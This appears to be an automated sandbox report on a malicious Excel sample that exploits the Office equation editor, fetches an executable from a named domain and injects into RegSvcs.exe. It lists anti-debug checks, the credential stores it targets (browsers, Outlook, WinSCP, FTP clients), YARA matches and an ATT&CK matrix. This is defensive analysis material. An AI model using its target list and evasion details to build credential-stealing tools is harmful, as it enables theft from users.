                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004440785_2_00444078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeAPI/Special instruction interceptor: Address: 35340C4
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeAPI coverage: 3.0 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3584Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452126
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,5_2_0045C999
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,5_2_00436ADE
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00434BEE
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,5_2_00436D2D
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442E1F
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0045DD7C FindFirstFileW,FindClose,5_2_0045DD7C
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD29
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00475FE5
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8D
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_0040E470
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-3133
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0045A259 BlockInput,5_2_0045A259
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D6D0
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0040EB70 LoadLibraryA,GetProcAddress,5_2_0040EB70
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035205B3 mov edx, dword ptr fs:[00000030h]2_2_035205B3
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_03534330 mov eax, dword ptr fs:[00000030h]5_2_03534330
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_03534390 mov eax, dword ptr fs:[00000030h]5_2_03534390
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_03532D00 mov eax, dword ptr fs:[00000030h]5_2_03532D00
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,5_2_00426DA1
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0042202E SetUnhandledExceptionFilter,5_2_0042202E
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_004230F5
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00417D93
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00421FA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0043916A LogonUserW,5_2_0043916A
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D6D0
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_004375B0
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,5_2_00436431
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe C:\Users\user\AppData\Local\Temp\zwuonypqu.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\zwuonypqu.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00445DD3
                  Source: zwuonypqu.exeBinary or memory string: Shell_TrayWnd
                  Source: zwuonypqu.exe, 00000005.00000000.469451319.0000000000482000.00000002.00000001.01000000.00000004.sdmp, zwuonypqu.exe, 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmp, zwuonypqu.exe.2.dr, ng5th[1].exe.2.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00410D10 cpuid 5_2_00410D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_004223BC
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004711D2 GetUserNameW,5_2_004711D2
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,5_2_0042039F
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_0040E470
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 5.2.zwuonypqu.exe.310000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.627037651.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: zwuonypqu.exe PID: 3708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3736, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: ng5th[1].exe.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
                  Source: zwuonypqu.exeBinary or memory string: WIN_XP
                  Source: zwuonypqu.exeBinary or memory string: WIN_XPe
                  Source: zwuonypqu.exeBinary or memory string: WIN_VISTA
                  Source: zwuonypqu.exeBinary or memory string: WIN_7
                  Source: Yara matchFile source: 5.2.zwuonypqu.exe.310000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.627037651.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.627425895.0000000002451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: zwuonypqu.exe PID: 3708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3736, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 5.2.zwuonypqu.exe.310000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.627037651.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: zwuonypqu.exe PID: 3708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3736, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_004741BB
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,5_2_0046483C
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,5_2_0047AD92
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  2
                  Valid Accounts
                  121
                  Windows Management Instrumentation
                  1
                  Scripting
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  13
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  121
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts33
                  Exploitation for Client Execution
                  2
                  Valid Accounts
                  2
                  Valid Accounts
                  2
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  2
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS138
                  System Information Discovery
                  Distributed Component Object Model121
                  Input Capture
                  22
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets43
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Valid Accounts
                  Cached Domain Credentials12
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                  Virtualization/Sandbox Evasion
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  Remote System Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1530597 Sample: Inquiry N TM24-10-09.xlam.xlsx Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 38 Multi AV Scanner detection for domain / URL 2->38 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 16 other signatures 2->44 8 EXCEL.EXE 6 9 2->8         started        process3 file4 22 C:\Users\...\~$Inquiry N TM24-10-09.xlam.xlsx, data 8->22 dropped 11 EQNEDT32.EXE 11 8->11         started        process5 dnsIp6 28 eficienciaeningenieria.com.mx 104.21.53.112, 49163, 80 CLOUDFLARENETUS United States 11->28 24 C:\Users\user\AppData\Local\...\zwuonypqu.exe, PE32 11->24 dropped 26 C:\Users\user\AppData\Local\...\ng5th[1].exe, PE32 11->26 dropped 54 Office equation editor establishes network connection 11->54 56 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->56 16 zwuonypqu.exe 1 11->16         started        file7 signatures8 process9 signatures10 30 Multi AV Scanner detection for dropped file 16->30 32 Machine Learning detection for dropped file 16->32 34 Writes to foreign memory regions 16->34 36 3 other signatures 16->36 19 RegSvcs.exe 2 16->19         started        process11 signatures12 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, 